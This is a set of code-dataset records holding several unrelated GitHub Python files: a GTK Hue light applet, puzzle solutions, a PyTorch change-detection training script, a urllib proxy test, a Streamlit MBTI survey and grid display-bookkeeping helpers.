}\\n\"\r\n\"</style></head><body style=\\\" font-family:\\'MS Shell Dlg 2\\'; font-size:7.8pt; font-weight:400; font-style:normal;\\\">\\n\"\r\n\"<p style=\\\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\\\"><span style=\\\" font-family:\\'MS Shell Dlg 2\\';\\\">Select Polling Action</span></p></body></html>\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MemberPoll = QtWidgets.QMainWindow()\r\n ui = Ui_MemberPoll()\r\n ui.setupUi(MemberPoll)\r\n MemberPoll.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"ctan01/CSC322Project","sub_path":"CreateMemberPoll.py","file_name":"CreateMemberPoll.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"21287475205","text":"\"\"\"\nlicht.app\n\n@author: phdenzel\n\"\"\"\nimport os\nimport logging\nimport signal\nimport licht\nfrom licht.rest import LichtClient\nimport gi\ngi.require_version(\"Gtk\", \"3.0\")\ngi.require_version(\"AppIndicator3\", \"0.1\")\nfrom gi.repository import Gtk, Gdk, AppIndicator3\n\n\nclass LichtIndicator(object):\n\n def __init__(self, root, app_name='licht', icon_path=None):\n self.app = root\n self.app_name = app_name\n if icon_path is not None:\n self.icon_path = icon_path\n else:\n self.icon_path = licht.icon_path\n self.icon_path = os.path.expanduser(self.icon_path)\n logging.info(f'Loading icon {self.icon_path}')\n self.indicator = AppIndicator3.Indicator.new(\n self.app_name, self.icon_path,\n AppIndicator3.IndicatorCategory.OTHER)\n self.indicator.set_status(AppIndicator3.IndicatorStatus.ACTIVE)\n menu = self.generate_menu()\n self.indicator.set_menu(menu)\n self.indicator.get_menu().connect('show', self.update)\n\n def update(self, event):\n \"\"\"\n Update all submenus\n Signal: <show>, connects to <Menu>\n \"\"\"\n menu = self.indicator.get_menu()\n data = self.app.data\n for i, item in enumerate(menu.get_children()):\n submenu = item.get_submenu()\n if submenu:\n data_attr = data.__getattribute__(submenu.get_name())\n self.update_submenu(submenu, data_attr)\n\n def generate_menu(self):\n \"\"\"\n Create a Menu containing submenus for a LichtClient's data fetch of\n lights, groups, and scenes\n \"\"\"\n menu = Gtk.Menu()\n # get data once and store\n data = self.app.data\n if data.lights is not None:\n item = self.menu_item(\"Lights\")\n submenu = self.generate_submenu(data.lights.names,\n device_id='lights/{}:{}')\n item.set_submenu(submenu)\n self.update_submenu(submenu, data.lights)\n menu.append(item)\n menu.append(self.separator)\n if data.groups is not None:\n item = self.menu_item(\"Rooms\")\n submenu = self.generate_submenu(data.groups.names,\n device_id='groups/{}:{}')\n item.set_submenu(submenu)\n self.update_submenu(submenu, data.groups)\n item.set_submenu(submenu)\n menu.append(item)\n menu.append(self.separator)\n if data.scenes is not None:\n item = self.menu_item(\"Scenes\")\n submenu = self.generate_submenu(data.scenes.names,\n device_id='scenes/{}:{}',\n on_off_toggle=False,\n bri_scale=False,\n ct_scale=False)\n item.set_submenu(submenu)\n menu.append(item)\n menu.append(self.separator)\n item = Gtk.MenuItem()\n item.set_label(\"Quit\")\n item.connect(\"activate\", self.app.on_exit, '')\n menu.append(item)\n menu.show_all()\n return menu\n\n def generate_submenu(self, name_index, device_id='lights/{}:{}',\n on_off_toggle=True, bri_scale=True, ct_scale=True):\n \"\"\"\n Create a Menu and populate it with MenuItems corresponding to\n a name index from data fetch\n \"\"\"\n submenu = Gtk.Menu()\n submenu.set_name(device_id.split('/')[0])\n for index, label in name_index.items():\n # Toggle on/off\n if on_off_toggle:\n check_item = self.check_item(label, bold=True, indent=0,\n device_id=device_id.format(index, 'on'),\n connect=('toggled',\n self.app.on_toggle_change))\n submenu.append(check_item)\n else:\n menuitem = self.menu_item(label, bold=False, indent=0,\n device_id=device_id.format(index, 'scene'),\n connect=('activate',\n self.app.on_activation_change))\n submenu.append(menuitem)\n # Brightness scale\n if bri_scale:\n bri_limits = licht.constants.limits_transf['bri']\n slider_item = self.slider_item(bri_limits[0], bri_limits[1], 1, _type='%',\n device_id=device_id.format(index, 'bri'),\n connect=(\"value-changed\",\n self.app.on_scroll_change))\n submenu.append(slider_item)\n # Color temperature scale\n if ct_scale:\n ct_limits = licht.constants.limits_transf['ct']\n slider_item = self.slider_item(ct_limits[0], ct_limits[1], 5, _type=\"Temp\",\n device_id=device_id.format(index, 'ct'),\n connect=(\"value-changed\",\n self.app.on_scroll_change))\n submenu.append(slider_item)\n submenu.append(self.separator)\n return submenu\n\n def update_submenu(self, menu, data):\n \"\"\"\n Update all MenuItems of a submenu corresponding to its properties\n \"\"\"\n for menu_item in menu.get_children():\n cls_name = menu_item.__class__.__name__\n if cls_name == 'SeparatorMenuItem':\n continue\n elif cls_name == 'CheckMenuItem': # Title on/off\n device_id = menu_item.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n state = data[idx][data.state_cmd][state_attr]\n menu_item.set_active(state)\n elif cls_name == 'MenuItem' and menu_item.get_children(): # Scale\n device_id = menu_item.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n if data.state_cmd not in data[idx]:\n continue\n state = data[idx][data.state_cmd][state_attr]\n # convert state depending on state_attr\n state = licht.constants.transformations[state_attr][0](state)\n slider = menu_item.get_children()[0]\n slider.set_value(state)\n\n def menu_item(self, label, checkbox=False, indent=False, bold=False,\n device_id=None, connect=None):\n \"\"\"\n Create a MenuItem and set its properties\n \"\"\"\n menuitem = Gtk.MenuItem()\n if indent:\n for i in range(int(indent)):\n label = f\"\\t{label}\"\n if label:\n menuitem.set_label(label)\n if bold:\n menuitem.get_children()[0].set_markup(f\"<b>{label}</b>\")\n if device_id:\n menuitem.set_name(device_id)\n if connect is not None:\n menuitem.connect(*connect)\n return menuitem\n\n def check_item(self, label, indent=False, bold=False, device_id=None,\n connect=None):\n \"\"\"\n Create a CheckMenuItem and set its properties\n \"\"\"\n menuitem = Gtk.CheckMenuItem()\n if indent:\n for i in range(int(indent)):\n label = f\"\\t{label}\"\n if label:\n menuitem.set_label(label)\n if bold:\n menuitem.get_children()[0].set_markup(f\"<b>{label}</b>\")\n if device_id:\n menuitem.set_name(device_id)\n if connect is not None:\n menuitem.connect(*connect)\n return menuitem\n\n def slider_item(self, range_min=0, range_max=100, range_inc=1,\n device_id=None, _type='%', connect=None):\n \"\"\"\n Create a MenuItem with a Scale widget and set its properties\n \"\"\"\n slider_menu = self.menu_item('')\n slider = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,\n range_min, range_max, range_inc)\n slider.set_hexpand(True)\n if connect is not None:\n slider.connect(*connect)\n if '%' in _type:\n slider.connect('format-value', self.slider_format(ps=_type))\n if \"Temp\" in _type:\n slider.connect('format-value', self.slider_format(title=_type))\n slider.set_value_pos(0) # on the left\n if device_id:\n slider_menu.set_name(device_id)\n slider.set_name(device_id)\n slider_menu.add(slider)\n slider_menu.add_events(Gdk.EventMask.SCROLL_MASK)\n slider_menu.connect('scroll-event', self.app.on_scroll)\n slider_menu.connect('button-press-event', self.app.on_scroll_click)\n return slider_menu\n\n def slider_format(self, title=\"\", ps=\"\"):\n \"\"\"\n Function factory for triggering formatting of a Scale widget's value\n Signal: <format-value>, connects to <Gtk.Scale>\n \"\"\"\n def scale_formatter(widget, value, title=title, ps=ps):\n formatted_str = \"{} {:3d}{} \".format(title, int(value), ps)\n return formatted_str\n return scale_formatter\n\n @property\n def separator(self):\n \"\"\"\n Wrapper for SeparatorMenuItem\n \"\"\"\n return Gtk.SeparatorMenuItem()\n\n\nclass LichtApplet(Gtk.Application):\n def __init__(self, app_name='licht', client=None):\n self.app_name = app_name\n self.client = client\n if self.client is None:\n self.client = LichtClient(licht.bridge_ip)\n self.indicator = LichtIndicator(self)\n\n @property\n def data(self):\n \"\"\"\n Trigger GET request for data fetch by client\n \"\"\"\n if hasattr(self, 'client'):\n data = self.client.fetch_data()\n self.data_cache = data\n return data\n\n def on_toggle_change(self, widget):\n \"\"\"\n Trigger PUT request for state change by client.\n State change specifications are drawn from the\n CheckMenuItem's name attribute and state.\n Signal: <value-changed>, connects to <CheckMenuItem>\n \"\"\"\n device_id = widget.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n data = self.data_cache.from_path(get_subpath)\n data_state = data[idx][data.state_cmd][state_attr]\n toggle_state = widget.get_active()\n if data_state != toggle_state:\n update = {state_attr: toggle_state}\n logging.info(f\"PUT: path: {data.put_path}\\tbody: {update}\")\n self.client.change_state(data=data, update=update)\n\n def on_activation_change(self, widget):\n \"\"\"\n Trigger PUT request for state change by client.\n State change specifications are drawn from the\n MenuItem's name attribute.\n Signal: <activate>, connects to <MenuItem>\n \"\"\"\n device_id = widget.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n data = self.data_cache.from_path(get_subpath)\n update = {state_attr: idx}\n logging.info(f\"PUT: path: {data.put_path}\\tbody: {update}\")\n self.client.change_state(subpath=data.put_path, update=update)\n\n def on_scroll_change(self, widget):\n \"\"\"\n Trigger PUT request for state change by client.\n State change specifications are drawn from the\n MenuItem's name attribute and its Scale widget state.\n Signal: <value-changed>, connects to <MenuItem>\n \"\"\"\n device_id = widget.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n data = self.data_cache.from_path(get_subpath)\n data_state = data[idx][data.state_cmd][state_attr]\n scroll_state = licht.constants.transformations[state_attr][1](\n widget.get_value())\n if data[idx][data.state_cmd]['on'] and (data_state != scroll_state):\n update = {state_attr: scroll_state}\n logging.info(f\"PUT: path: {data.put_path}\\tbody: {update}\")\n self.client.change_state(data=data, update=update)\n\n def on_scroll_click(self, widget, event):\n \"\"\"\n Manipulate the Scale widgets of a MenuItem by propagating\n the cursor position to the underlying Scale widget.\n Signal: <button-press-event>, connects to <MenuItem>\n \"\"\"\n scale = widget.get_children()[0]\n current_val = scale.get_value()\n range_min = scale.get_adjustment().get_lower()\n range_max = scale.get_adjustment().get_upper()\n walloc = widget.get_allocation()\n alloc = scale.get_allocation()\n spacing = walloc.width - alloc.width\n scale_offset = scale.get_layout().get_pixel_size()[0] + spacing\n scale_width = alloc.width - (scale_offset - alloc.x)\n cursor_x = (event.x - scale_offset) / scale_width\n val = licht.utils.linear_transformation(\n cursor_x, 0, 1, range_min, range_max,\n allow_out_of_bounds=False, as_int=True)\n if val != current_val:\n scale.set_value(val)\n\n def on_scroll(self, widget, event):\n \"\"\"\n Manipulate the Scale widget of a MenuItem.\n Signal: <scroll-event>, connects to <MenuItem>\n \"\"\"\n scale = widget.get_children()[0]\n current_val = scale.get_value()\n range_min = scale.get_adjustment().get_lower()\n range_max = scale.get_adjustment().get_upper()\n range_inc = scale.get_adjustment().get_step_increment()\n if event.direction == Gdk.ScrollDirection.UP:\n val = min(current_val+range_inc, range_max)\n elif event.direction == Gdk.ScrollDirection.DOWN:\n val = max(current_val-range_inc, range_min)\n scale.set_value(val)\n\n def on_exit(self, widget, event):\n \"\"\"\n Trigger exit from applet.\n Signal: <activate>\n \"\"\"\n Gtk.main_quit()\n\n def run(self):\n \"\"\"\n Run Gtk main\n \"\"\"\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n Gtk.main()\n\n\nif __name__ == \"__main__\":\n licht_applet = LichtApplet()\n","repo_name":"phdenzel/licht","sub_path":"licht/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"5714180063","text":"def parse(line):\n op, coords = line.split()\n x, y, z = map(lambda b: (int(b[0]), int(b[1])), map(lambda a: a[2 : ].split(\"..\"), coords.split(\",\")))\n # print(op, op == \"on\")\n return (op == \"on\", (x, y, z))\n\nwith open(\"input\") as f:\n data = [parse(line) for line in f.readlines() if line]\n# print(data)\ncube = [[[False] * 101 for _ in range(101)] for _ in range(101)]\n\nfor line in data:\n op, (x, y, z) = line\n for i in range(max(x[0], -50), min(x[1], 50) + 1):\n for j in range(max(y[0], -50), min(y[1], 50) + 1):\n for k in range(max(z[0], -50), min(z[1], 50) + 1):\n # print(op, k + 50, j + 50, i + 50)\n cube[k + 50][j + 50][i + 50] = op\n\nprint(sum(sum(sum(i) for i in j) for j in cube))\n\n","repo_name":"aiviaghost/Advent_of_Code_2021","sub_path":"Day_22/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"31814623423","text":"from typing import List\n\n\nclass Solution1:\n def is_alien_sorted(self, words: List[str], order: str) -> bool:\n order_dict = {}\n for i, s in enumerate(order):\n order_dict[s] = i\n for i in range(1, len(words)):\n for j in range(len(words[i-1])):\n if j == len(words[i]) or order_dict[words[i-1][j]] > order_dict[words[i][j]]:\n return False\n if order_dict[words[i-1][j]] < order_dict[words[i][j]]:\n break\n return True\n\n\nclass Solution2:\n \"\"\" Simplified of Solution1 \n\n Borrow from: https://leetcode.com/problems/verifying-an-alien-dictionary/discuss/203185/JavaC%2B%2BPython-Mapping-to-Normal-Order\n\n \"\"\"\n\n def is_alien_sorted(self, words, order):\n order_dict = {s: i for i, s in enumerate(order)}\n words = [[order_dict[x] for x in word] for word in words]\n return all(word1 < word2 for word1, word2 in zip(words, words[1:]))\n\n\nif __name__ == '__main__':\n words = [\"word\"]\n order = 'worldabcefghijkmnpqstuvxyz'\n ans = Solution1().is_alien_sorted(words, order)\n print(ans)\n","repo_name":"YuhanShi53/Leetcode_Solutions","sub_path":"solutions/Leetcode_953/leetcode_953.py","file_name":"leetcode_953.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"36475446410","text":"import numpy as np\nimport os\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torch.utils.data as Data\nimport torchvision.datasets as dates\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nimport shutil\nimport cv2\nimport tqdm\nfrom einops.einops import rearrange\nimport math\nfrom torchvision import transforms as transforms1\nfrom torch.optim import lr_scheduler\nimport cfgs.config as cfg\nimport dataset.CD_dataset as dates\n\n\n\ndef check_dir(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n\nab_test_dir = cfg.SAVE_PATH\ncheck_dir(ab_test_dir)\n\n\n\ndef main():\n\n train_transform_det = dates.Compose([\n dates.Scale(cfg.TRANSFROM_SCALES),\n ])\n val_transform_det = dates.Compose([\n dates.Scale(cfg.TRANSFROM_SCALES),\n ])\n\n train_data = dates.Dataset(cfg.TRAIN_DATA_PATH,cfg.TRAIN_LABEL_PATH,\n cfg.TRAIN_TXT_PATH,'train',transform=True,\n transform_med = train_transform_det)\n train_loader = Data.DataLoader(train_data,batch_size=cfg.BATCH_SIZE,\n shuffle= True, num_workers= 4, pin_memory= True)\n val_data = dates.Dataset(cfg.VAL_DATA_PATH,cfg.VAL_LABEL_PATH,\n cfg.VAL_TXT_PATH,'val',transform=True,\n transform_med = val_transform_det)\n val_loader = Data.DataLoader(val_data, batch_size= cfg.BATCH_SIZE,\n shuffle= False, num_workers= 4, pin_memory= True)\n # build model\n import model as models\n device = torch.device(\"cuda:0\")\n model = models.Change_detection()\n\n model= nn.DataParallel(model, device_ids = cfg.gpu_ids)\n model.to(device)\n\n # Cross entropy loss\n MaskLoss = torch.nn.CrossEntropyLoss().to(device)\n\n # Optimizer\n optimizer = torch.optim.SGD(model.parameters()\n ,lr=cfg.INIT_LEARNING_RATE,momentum=cfg.MOMENTUM,weight_decay=cfg.DECAY)\n\n # Scheduler, For each 50 epoch, decay 0.1\n scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1)\n\n\n print(\"train_loader\", len(train_loader))\n print(\"val_loader\", len(val_loader))\n loss_pre = 100000\n\n \n for epoch in range(cfg.MAX_ITER):\n print(\"epoch\", epoch, \"learning rate: \", optimizer.param_groups[0]['lr'])\n model.train()\n # Start to train\n for batch_idx, batch in tqdm.tqdm(enumerate(train_loader)):\n step = epoch * len(train_loader) + batch_idx\n img1_idx,img2_idx,label_idx, filename,height,width = batch\n \n\n img1 = img1_idx.to(device)\n img2 = img2_idx.to(device)\n label = label_idx.to(device) \n \n \n output_map = model(img1, img2)\n b_num = output_map.shape[0]\n gt = Variable(dates.resize_label(label.data.cpu().numpy(), \\\n size=output_map.data.cpu().numpy().shape[2:]).to(device)) \n\n loss = MaskLoss(output_map, gt.long())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (batch_idx) % 100 == 0:\n print(\" Epoch [%d/%d] Loss: %.4f \" % (epoch, batch_idx,loss.item()))\n loss_total = 0\n\n # Start to validate\n for batch_idx, batch in tqdm.tqdm(enumerate(val_loader)):\n with torch.no_grad():\n img1_idx,img2_idx,label_idx, filename,height,width = batch\n img1 = Variable(img1_idx.to(device))\n img2 = Variable(img2_idx.to(device))\n label = Variable(label_idx.to(device))\n output_map = model(img1, img2)\n gt = Variable(dates.resize_label(label.data.cpu().numpy(), \\\n size=output_map.data.cpu().numpy().shape[2:]).to(device))\n loss = MaskLoss(output_map, gt.long())\n #loss = MaskLoss(output_map, gt.float())\n loss_total = loss_total + loss\n scheduler.step()\n print(\"loss_total\", loss_total)\n print(\"loss_pre\", loss_pre)\n if loss_total < loss_pre: \n loss_pre = loss_total\n torch.save({'state_dict': model.state_dict()}, os.path.join(ab_test_dir, 'model_best.pth'))\n\n if epoch % 10 == 0:\n torch.save({'state_dict': model.state_dict()}, os.path.join(ab_test_dir, 'model' + str(epoch) + '.pth'))\n \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"f64051041/SARAS-Net","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"57"} +{"seq_id":"1220290403","text":"# -*- coding:utf-8 -*-\nimport urllib\nfrom urllib import request\n\nfrom common.IPUtils import get_IP_list\n\n__author__ = 'zhennehz'\n\nif __name__ == \"__main__\":\n #get_IP_list()\n '''\n # 访问网址\n url = 'https://ip.cn/'\n # 这是代理IP\n # 这是代理IP\n proxy = {'https': '113.239.226.245:80'}\n # 创建ProxyHandler\n proxy_support = request.ProxyHandler(proxy)\n # 创建Opener\n opener = request.build_opener(proxy_support)\n # 添加User Angent\n opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36')]\n # 安装OPener\n # request.install_opener(opener)\n # 使用自己安装好的Opener\n # response = request.urlopen(url)\n # 如果不想安装也可以直接使用opener来执行\n response = opener.open(url)\n # 读取相应信息并解码\n html = response.read().decode(\"utf-8\")\n # 打印信息\n html = BeautifulSoup(html, 'html.parser')\n print(html.select(\"#result\"))\n '''\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',\n 'Cookie': 'gr_user_id=1f9ea7ea-462a-4a6f-9d55-156631fc6d45; bid=vPYpmmD30-k; ll=\"118282\"; ue=\"codin; __utmz=30149280.1499577720.27.14.utmcsr=douban.com|utmccn=(referral)|utmcmd=referral|utmcct=/doulist/240962/; __utmv=30149280.3049; _vwo_uuid_v2=F04099A9dd; viewed=\"27607246_26356432\"; ap=1; ps=y; push_noty_num=0; push_doumail_num=0; dbcl2=\"30496987:gZxPfTZW4y0\"; ck=13ey; _pk_ref.100001.8cb4=%5B%22%22%2C%22%22%2C1515153574%2C%22https%3A%2F%2Fbook.douban.com%2Fmine%22%5D; __utma=30149280.833870293.1473539740.1514800523.1515153574.50; __utmc=30149280; _pk_id.100001.8cb4=255d8377ad92c57e.1473520329.20.1515153606.1514628010.'\n }\n\n url = \"https://ip.cn/\"\n\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\n # 设置代理 IP,http 不行,使用 https\n proxy = request.ProxyHandler({'https': '114.7.15.146:8080'})\n auth = request.HTTPBasicAuthHandler()\n # 构造 opener\n opener = request.build_opener(proxy, auth, request.HTTPHandler)\n # 添加 header\n opener.addheaders = [('User-Agent', user_agent)]\n # 安装 opener\n request.install_opener(opener)\n # 打开链接\n req = urllib.request.Request(url, None, headers)\n\n conn = request.urlopen(req)\n # 以 utf-8 编码获取网页内容\n content = conn.read().decode('utf-8')\n # 输出\n print(content)\n","repo_name":"yyfuzhen/mapspider","sub_path":"test/testproxies.py","file_name":"testproxies.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"34093295521","text":"import time\r\nimport pandas as pd\r\nimport streamlit as st\r\n\r\ninflobj = open('file.txt', 'r', encoding='utf-8')\r\n\r\ndata = inflobj.read()\r\ninflobj.close()\r\n\r\nst.title(\"2-6 MBTI 설문조사\")\r\nnum = st.number_input(\"학번을 입력해주세요\", min_value=20601, max_value=20626)\r\n\r\nbox = st.text_input(label=\"이름(3글자)을 입력해주세요\")\r\n\r\nradfirst = st.radio(\"MBTI 첫번째 자리\", ('I', 'E'))\r\nradsecond = st.radio(\"MBTI 두번째 자리\", ('N', 'S'))\r\nradthird = st.radio(\"MBTI 세번째 자리\", ('T', 'F'))\r\nradfourth = st.radio(\"MBTI 네번째 자리\", ('J', 'P'))\r\n\r\ndef chart(data):\r\n c = \"IE NS TF JP\"\r\n cl = c.split(\" \")\r\n op = []\r\n for i in range(16):\r\n bina = str(bin(i))[2:]\r\n x = \"0\" * (4 - len(bina)) + bina\r\n print(x)\r\n #list = list(x)\r\n result = []\r\n for j in range(0, 4):\r\n print(int(x[j]))\r\n result.append(str(cl[j][int(x[j])]))\r\n op.append(\"\".join(result))\r\n\r\n print(op)\r\n\r\n amount = []\r\n for i in range(16):\r\n amount.append(data.count(op[i]))\r\n\r\n\r\n #lst = \"INTJ INTP INFJ INFP ISTJ ISTP ISFP\"\r\n\r\n chart_data = pd.DataFrame(\r\n amount, index=op)\r\n st.bar_chart(chart_data)\r\n\r\ndef chartb(data):\r\n c = list(\"IENSTFJP\")\r\n amount = []\r\n for i in range(8):\r\n amount.append(data.count(c[i]))\r\n\r\n chartb_data = pd.DataFrame(\r\n amount, index=c)\r\n st.bar_chart(chartb_data)\r\n\r\nif st.button(\"제출\"):\r\n if 20600 < num < 20627 and len(box) == 3:\r\n mbti = radfirst + radsecond + radthird + radfourth\r\n wri = str(num) + \" \" + str(box) + \" : \" + mbti + \" - \"\r\n if wri not in data:\r\n inflobj = open('file.txt', 'a', encoding='utf-8')\r\n\r\n\r\n inflobj.write(wri + str(time.time()) + '\\n')\r\n inflobj.close()\r\n\r\n inflobj = open('file.txt', 'r', encoding='utf-8')\r\n output = inflobj.read()\r\n inflobj.close()\r\n\r\n st.code(output)\r\n a = st.caption(\"-------------------------\\n총\" + str(output.count(\"\\n\")) + \"명이 설문조사에 참여했습니다\")\r\n chart(output)\r\n chartb(output)\r\n else:\r\n st.caption(\"중복되는 데이터가 있습니다\")\r\n st.code(data)\r\n chart(data)\r\n chartb(data)\r\n else:\r\n st.caption(\"학번이나 이름이 잘못 입력되었습니다\")\r\n st.code(data)\r\n chart(data)\r\n chartb(data)\r\n\r\nelse:\r\n st.code(data)\r\n\r\n st.caption(\"-------------------------\\n총\" + str(data.count(\"\\n\")) + \"명이 설문조사에 참여했습니다\")\r\n\r\n chart(data)\r\n chartb(data)\r\n\r\nst.caption(\"Made by 민경현\")\r\n","repo_name":"mineu1/mbti","sub_path":"mbti.py","file_name":"mbti.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70900173297","text":"from .classes import SystemState\nfrom .servo import initialize as servoInitialize\nimport yaml\n\n\ndef initialize():\n with open(\"./limb/config.yml\") as f:\n configData = yaml.safe_load(f)\n\n systemSTATE = SystemState()\n # get config from config.yml\n servoPins = configData[\"servoPins\"]\n systemSTATE.servoDict = servoInitialize(servoPins)\n if systemSTATE.check_initialized() is False:\n raise Exception(\"System not initialized.\")\n return systemSTATE\n","repo_name":"Augmentation-Lab/limbX","sub_path":"limb/utilities/servoDict.py","file_name":"servoDict.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34541850265","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\n\nfrom mig.shared.fileio import pickle, unpickle\nfrom mig.shared.conf import get_configuration_object\n\n\ndef initialize_and_get_display_dict_filename(configuration, logger):\n filename = os.path.join(configuration.mig_server_home, 'livedisplaysdict')\n if os.path.isfile(filename):\n return (True, filename)\n logger.info('display dict file %s not found, pickling a new with {} as only content'\n % filename)\n\n dict = {}\n pickle_status = pickle(dict, filename, logger)\n if not pickle_status:\n return (False, 'could not pickle %s when initializing'\n % filename)\n return (True, filename)\n\n\ndef get_users_display_number(client_id, configuration, logger):\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n (key, value) = get_users_display_dict(client_id, configuration,\n logger)\n\n if not key:\n logger.error(value)\n return False\n return key\n\n\ndef get_users_display_dict(client_id, configuration, logger):\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n dict = unpickle(filename, logger)\n if dict is False:\n return (False, 'could not unpickle %s' % filename)\n\n for (key, value) in dict.items():\n if value['client_id'] == client_id:\n return (key, value)\n\n # not found, client_id does not have a live display\n\n return (-1, -1)\n\n\ndef set_user_display_inactive(\n client_id,\n display_number,\n configuration,\n logger,\n):\n\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n current_display = get_users_display_number(client_id,\n configuration, logger)\n if not current_display:\n return (False,\n 'could not remove active display since no entry was found for %s'\n % client_id)\n\n if current_display == -1:\n return (False,\n 'user %s does not have a display registered, unable to inactivate any display'\n % client_id)\n\n if current_display != display_number:\n return (False,\n 'user %s had display %s registered in dict, but specified display_number in set_user_display_inactive was %s'\n % (client_id, current_display, display_number))\n\n # remove entry from dict and pickle it\n\n dict = unpickle(filename, logger)\n if dict is False:\n return (False, 'could not unpickle %s' % filename)\n\n if display_number not in dict:\n return (False, 'display %s not found in dict' % display_number)\n try:\n del dict[display_number]\n except Exception as e:\n return (False,\n 'exception trying to remove %s from display dict. Exception %s'\n % (display_number, e))\n\n pickle_status = pickle(dict, filename, logger)\n\n if not pickle_status:\n return (False, 'could not pickle %s when removing %s'\n % (filename, display_number))\n return (True, '')\n\n\ndef get_dict_from_display_number(display_number, configuration, logger):\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n dict = unpickle(filename, logger)\n if dict is False:\n print('dict is %s false' % dict)\n return (False, 'could not unpickle %s' % filename)\n\n if display_number in dict:\n return (display_number, dict[display_number])\n else:\n return (True, -1)\n\n\ndef set_user_display_active(\n client_id,\n display_number,\n vnc_port,\n password,\n configuration,\n logger,\n ):\n\n (init_ret, filename) = \\\n initialize_and_get_display_dict_filename(configuration, logger)\n if not init_ret:\n return (False, 'could not initialize')\n\n (dis_ret, dis_dict) = get_dict_from_display_number(display_number,\n configuration, logger)\n if not dis_ret:\n return (False, 'dict error, %s' % dis_dict)\n if dis_dict != -1:\n if dis_dict['client_id'] != client_id:\n\n # display occupied by another user!\n\n return (False, 'display %s already in use by another user!'\n % display_number)\n\n # getting here means display is free or used by client_id\n\n dict = unpickle(filename, logger)\n if dict is False:\n return (False, 'could not unpickle %s' % filename)\n\n current_display = get_users_display_number(client_id,\n configuration, logger)\n if not current_display:\n\n # register display\n\n dict[display_number] = {'client_id': client_id,\n 'vnc_port': vnc_port,\n 'password': password}\n pickle_status = pickle(dict, filename, logger)\n\n if not pickle_status:\n return (False, 'could not pickle %s when adding %s'\n % (filename, dict[display_number]))\n logger.info('successfuly registered that display %s is in use by %s in %s'\n % (display_number, client_id, filename))\n return (True, '')\n\n if current_display != display_number and current_display != -1:\n\n # problems..\n\n return (False,\n 'set_user_display_active met a conflict, can not set display %s when user already has %s registered'\n % (display_number, current_display))\n else:\n\n # add display to dict\n\n dict[display_number] = {'client_id': client_id,\n 'vnc_port': vnc_port,\n 'password': password}\n pickle_status = pickle(dict, filename, logger)\n\n if not pickle_status:\n return (False, 'could not pickle %s when adding %s'\n % (filename, dict[display_number]))\n\n logger.info('successfuly registered that display %s is in use by %s in %s %s'\n % (display_number, client_id, dict, filename))\n return (True, '')\n\n\n# test of functions\n\nif '__main__' == __name__:\n print('*** Testing livedisplayfunctions ***')\n\n # from mig.shared.cgishared import init_cgiscript_possibly_with_cert\n # (logger, configuration, client_id, o) = init_cgiscript_possibly_with_cert()\n\n client_id = 'Henrik_Hoey_Karlsen3'\n configuration = get_configuration_object()\n logger = configuration.logger\n (stat, msg) = get_users_display_dict(client_id, configuration,\n logger)\n print('users_display_dict status: %s, msg: %s' % (stat, msg))\n","repo_name":"ucphhpc/migrid-sync","sub_path":"mig/shared/livedisplaysfunctions.py","file_name":"livedisplaysfunctions.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} 